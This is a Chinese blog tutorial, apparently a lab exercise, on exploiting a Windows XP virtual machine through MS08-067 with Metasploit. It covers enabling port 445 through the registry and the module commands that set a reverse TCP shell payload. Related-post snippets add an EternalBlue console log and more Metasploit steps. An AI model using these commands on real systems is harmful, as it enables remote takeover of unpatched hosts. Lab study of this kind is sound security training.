Metasploit攻击xp,windows/smb/ms08_067_netapi

最新推荐文章于 2025-03-19 14:00:00 发布
置顶 最新推荐文章于 2025-03-19 14:00:00 发布
阅读量2k 收藏 8
点赞数
分类专栏: 网络安全 文章标签: metasploit 渗透攻击 ms08_067_netapi 网络攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shiliang1995/article/details/102699033
版权

第一步 安装XP虚拟机

这里用的系统版本如下

然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击

所以先对XP设置一下

编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters

在Parameters上右键新建DWORD值,数值为1,重命名为SMBDeviceEnabled

然后重启设备,再用nmap去扫描就可以发现,可以扫到445端口了

第二步 使用metasploit对XP发起攻击

1 开启metasploit

2 选择攻击模块 exploit/windows/smb/ms08_067_netapi

3 查看参数 show options

4 设置目标主机 set rhosts 172.16.5.9

5 设置target: set target 34

6 设置payload:set payload windows/shell_reverse_tcp

7 查看设置完成的参数

8 执行攻击 exploit

到此,攻击成功!

 

 

 

利用metasploit通过ms_08_067_netapi漏洞渗透winXp
cool_jia的博客
12-19 2687
攻击主机为装了metasploit的win10 目标主机为虚拟机中的winxp专业版sp3(需要关闭防火墙) 虚拟机中系统采用的桥接方式 1.启动metasploit 2.使用ms_08_067_netapi渗透模块,并查看信息 3.查看可用的攻击载荷 4.选择攻击载荷generic/shell_bind_tcp(此处就是要获取对方的控制台),查看有哪些参数要设置 5
Metasploit攻击winXP
2301_77778745的博客
04-25 180
Attack——smb——【所攻击的漏洞】在另一个终端启动Metasploit服务。启动PostgreSQL服务。启动Armitage。
网络服务器攻击渗透MS08-067
weixin_47114294的博客
03-19 289
影响协议:Server 服务(通过 SMB 协议处理 RPC 请求)漏洞类型:缓冲区溢出漏洞(远程未认证利用)危害等级:高危(CVSS 3.0 评分 10.0)Windows XP(SP0-SP3,未打补丁)Windows Server 2003(SP0-SP2,未打补丁)Windows Vista(部分版本)Windows Server 2008(部分版本)注意:Windows 7 及更高版本默认不受影响,但需注意旧版企业环境中可能仍存在未升级的系统。
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4697
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
Metasploit攻击winXP实例
m0_51186260的博客
05-22 562
ipconfig 查看网络配置信息 2.关闭目标主机防火墙 3.攻击主机查看当前用户和ip地址 service postgresql start 启动PostgreSQL服务 service metasploit start 在另一个终端启动Metasploit服务 armitage 启动Armitage 5.进入Armitage初始界面 扫描目标网段完整信息 7.扫描网段 8.扫描出主机 查看目标主机上开启的服务,选中目标主机10.1.1.130,右键选择Servi.
使用MSF 利用 ms08_067XP 进行渗透
枫梓林のBlog
04-21 2819
利用 ms08_067XP 进行渗透 文章目录利用 ms08_067XP 进行渗透一、项目要求二、项目实施1. 实施目标2. 实施方案2.1 扫描该网段存活的主机2.2 使用nmap 判断目标主机IP地址2.3 使用 nessus 扫描该系统漏洞2.4 使用 MetasploitXP 进行渗透三、总结 一、项目要求 渗透XP系统 在系统中执行几条命令 二、项目实施 1. 实施目标 使用工具寻找目标内存活的主机 使用工具,判断其操作系统,及相关信息收集 扫描该系统的漏洞,进行复
msf6 exploit(windows/smb/ms17_010_eternalblue) > nmap -O 192.168.200.129 [*] exec: nmap -O 192.168.200.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:32 EDT Nmap scan report for 192.168.200.129 Host is up (0.00026s latency). Not shown: 992 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s MAC Address: 00:0C:29:1B:D6:5A (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445 rport => 445 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.200.208:4444 [*] 192.168.200.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.200.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [*] 192.168.200.129:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.200.129:445 - The target is vulnerable. [-] 192.168.200.129:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets [*] Exploit completed, but no session was created.
最新发布
03-22
use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.200.129 run ``` 5. **补充建议** - **验证目标架构准确性**: 使用`nmap -sV --script smb-os-discovery 192.168.200.129`进一步确认系统...
metasploit 框架之利用 ms08_067 漏洞渗透Windows XP SP3 Chinese - Simplified (NX)实验过程及错误处理
热门推荐
max_ii_min的博客
02-18 2万+
1:渗透目标 查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击渗透成功拿到会话后,执行一些命令。 2:准备阶段 2.1软件 Kali linux (链接:https://pan.baidu.com/s/1b3eE0c8vNPqGWMzWoLZhpw 提取码:siud) Windows XP SP3 Chinese - Simplified (NX)(链接:https://p...
MS08_067漏洞复现与总结
马赛克的博客
02-28 6934
00x00 原理:攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 安全补丁:KB958644 00x01 #准备工作 两台虚拟机,一台为kali ip:10.10.10.131 一台为Windowsxpsp3英文版 ip:10.10.1...
ms08_067漏洞分析 实验成功复现 xpsp3利用条件
田一柠的博客
12-10 397
一、环境: 目标:windows xpsp3 中文版(英文版成功率更高) 二、设置(缺一不可): 1.关闭防火墙服务(否则会显示连接超时) 2.关闭自动更新服务 3.开启445端口 4.开启server服务 5.开启computer browser服务 6.开启workstation服务 三、msf漏洞复现metasploit 1):查找漏洞 命令:search ms08_067 2):选择rank等级较高的模块(great) 命令:use exploit/windows/smb/
Metasploit简单利用及入侵Windows7案例.docx
11-13
- **选择攻击模块**:使用`exploit/windows/smb/ms08_067_netapi`模块进行攻击。 - **参数配置**: - **PAYLOAD**:选择合适的payload,如`windows/meterpreter/reverse_tcp`。 - **TARGET**:根据目标系统版本...
XP SMB服务漏洞MS17-010 勒索病毒(WannaCry UIWIX)补丁
05-18
windows XP三种语言(简体 ,繁体和英文)的漏洞补丁,专门针对目前流行的勒索病毒(WannaCry UIWIX),修复windows系统的 SMB服务漏洞MS17-010
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067Windows Server 2003 SP0)、Samba(Ubuntu 8.04)
agjirowjtg的博客
02-01 3583
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
小白Kali渗透Windows XP专业版SP3
m0_70497070的博客
09-17 2033
小白学Kali?机会来了!
使用Metaspoit攻击MS08-067
weixin_30500663的博客
04-21 313
kali视频学习请看 http://www.cnblogs.com/lidong20179210/p/8909569.html 使用Metaspoit攻击MS08-067 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000Wind...
MSF完成对win7;xp的漏洞攻击
qq_61988806的博客
01-03 855
msf渗透win7 winxp(持续更新)
msfconsole——smb_version扫描可攻击的445端口
Ho1aAs‘s Blog
07-28 3533
文章目录一、使用环境二、smb_version完 免责声明:本文章仅供学习、交流使用 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole 二、smb_version 若只针对445端口以及使用ms17010 EternalBlue永恒之蓝 渗透,可以使用此工具快速扫描 在msfconsole下键入search smb_version并use加载 配置RHOST(对象)快速扫描 192.168.x.1/24扫描整个子网 完 欢迎在评论区留言 感谢
Metasploit利用MS08-067漏洞
test
11-20 9577
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS08-067.ms08_...
MSF 综合利用: MYSQL & SMBRelay攻击(炊少教学)
weiliang369的博客
02-27 705
下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功! 下面来PENTEST : 一个注入点,他是ROOT的权限 我们来尝试他能不能读文件,ROOT权限应该能读 恩 ,能读文件 (惊现HELEL大黑客!) 下面本地伪造个SMB SERVER服务器 msf > use auxiliary/server/capture/smb msf auxiliary(smb) > show ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Test9912

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值